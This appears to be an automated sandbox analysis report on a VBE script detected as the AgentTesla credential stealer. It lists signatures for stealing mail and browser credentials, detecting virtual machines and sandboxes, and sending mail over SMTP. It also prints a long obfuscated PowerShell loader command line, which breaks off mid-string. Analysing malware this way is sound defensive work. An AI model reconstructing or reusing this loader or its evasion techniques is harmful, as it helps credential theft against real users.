Windows Analysis Report
transferencia.....vbe
Overview
General Information
Detection
AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Uses a known web browser user agent for HTTP communication
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 788, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.....vbe", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- cmd.exe (PID: 6032, cmdline: cmd /c echo shell, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6028, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5792, cmdline (obfuscated, truncated in the report):
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Ligh = "" "BlFUfuHan NycButVoiS aoSpnOu My HFdTUbBSv Sv{Sk Vt S p Af SkpSk aPrrOsaHom Tr(Su[NoSE ntBarLyiSp nNegLe]De` $BeuFoeTig KvePsnFonI myAdtOftKu iPh)Ud;me Ak`$KaECik GesShaHomU n Ki=Sy es 'Pr'No;Ki UnWTrrFoiF atMieLo-Gr HEuoBosNut St Pa`$ciE RnkUnsUdaI mmFe;Ca Be WCorMaiSet PleMu-SpHU noGesEntLo Ru`$WeECo kCesAcaSpm Ma;Fo SkWS yrMaiaftDo eUr-SkHOpo SksPltpr A d`$CaEMekA lsShaTamUd ;In Si Si Di St`$FlU SonsehdiaW asTitMaiLs Fi=Ce VeN CheBrwSt-t yOPrbAfjBr eEncBltdi LibSoyArtB aeSp[No]No To(Ca`$An uEveFagQue DenAvnAlyD itArtShiSe .MeLAreMin tegHotUphO v Fo/Mo Fl 2Br)Pr;Ta Fo Io Ko W iFPioPorAs (ni`$AmMGe ePlnPadGei SpcanpNilF iaTinBatLa 2Ov1Du6Sl= Hr0Te;so f a`$FoMPleO rnKodToiOv cKrpTalpea BanPatCh2B o1Di6Se Ca -DolBrtsi sy`$GuuMee VagUnePand inHaysmtFl tTaiQu.ArL AreAfnTigb etUnhSe;Op ma`$beMFa eLinPrdMoi TucBapSelT rahanEgtub 2Ly1Ak6Sy+ Un=No2Di)u m{Ar So Is Om Sp Sk Ra Tr In`$ haUTanSahU haAgsThtUn iIn[Ha`$do MSteKnnBod FoiTucImpD ilsvaRanBi tho2Ph1Br6 Fo/Ol2ta]B e Fe=Ma Ok [KucGroDin MivBreCarV itAc]In:Up :FrTHeoBaB ReyMitKoeJ e(ba`$AkuS keSkgAueTe nOunEkyMit RetEuiNo.O pSSluBebFi sAgtHirGoi HynTigTr(U n`$UsMgreu nnVedHeiSn cBrpSelDra AvnGotNo2O a1Jo6To,Na Bo2Sk)Ti, Ka Gr1Fo6B a)Kv;Th St Br`$PeUEj nWhhThaChs HetSpiEn[r i`$SpMSieB rnTadAaica cDepTylUna GanHotDi2S t1Ba6An/Ul 2Pr]De Ne= Lu En(Hy`$ TrUPonEahW iaFlsOttNo iSu[Mg`$Tr MBeePlnRed KuiSkcRepB ulSuaApnca tFo2Ov1od6 Un/Ti2St]E s Se-HebUn xFloArrCh Di2Re1Kl0K a)Wi;ae Ge Be Ru bu} Su Ro[CoSS ntNurHeiSp nPrgHv]st[ PnSYoyDesB etUdeAumBr .EqTDieTex SktEl.TiEV anRucGroHo dOmiAtnBig Uh]In:Su:G eAprSTrCCr IPeISl.FuG MieJutInSR etCarFoiAn nHygPu(Th` $FrUPenMuh OxatisJitD eiNo)fy;Sv }Ex`$SapBa obilFraGgr BaiBlsCoaC atSmiUd0Br =MyHGeTBaB If Kr'Da8R e1MiAChBUu ABe1DuAPe6 EdBCo7LoBR eFSnFTaCTe BCe6PiBHoE udBReEKl'O v;Si`$BopA uotolSoaVi rLliBosBia JetSkiAu1G o=PiHOpTOs BBo Eu'Ko9 TeFPrBGeBB aBHv1OnASe 0ToBUsDAgA Si1MiBSmDc yBRe4StABu 6PuFJaCSo8 
Ar5HaBTeBV iBReCMoESu 1ReESy0FoF naCVi8No7D iBMeCBeATe 1YeBHu3MiB De4FlBMu7S o9VeCOcBFl 3reARe6SaB BrBPrAPr4s tBBr7Sa9Tr FTeBUn7SoA ag6NaBKvAA sBChDBaBCu 6spAUl1An' Sa;As`$Unp CroBrlOpaR erOpiTosFi aEntLeiDe2 An=ReHhuTR eBhu Au'Ch 9Th5AfBTh7 SiAMi6ko8G a2OrAMi0Ti BCuDKnBOu1 Ud9To3MiBb a6BaBRe6Te AFr0TaBOp7 ElAVa1PrAA l1Br'Mi;sp `$BopIdoUn lInaCarMai MesKaaUntL eiAu3Va=So HPeTBeBMi Fl'Pe8Hi1S tABrBOuAje 1hyALe6MoB Gu7unBReFN oFLyCGo8Eq 0FaAef7UdB FoCsaAVe6t oBGrBPaBst FPrBba7BeF InCDe9SlBS tBFaCTrAIn 6NoBsk7PlA Ti0ScBLoDM aASh2Sa8Ti 1AnBNi7WrA un0deAHy4P rBAlBMiBAn 1OvBOr7AfA op1AdFFoCA b9InACaBDi 3VaBClCPhB lo6MoBRoES jBUb7So8Ma 0BuBRo7ArB Fi4Do'Tr;G l`$IlpCroS ulDraAkrDi iloslgaPrt FoiEr4Ko=S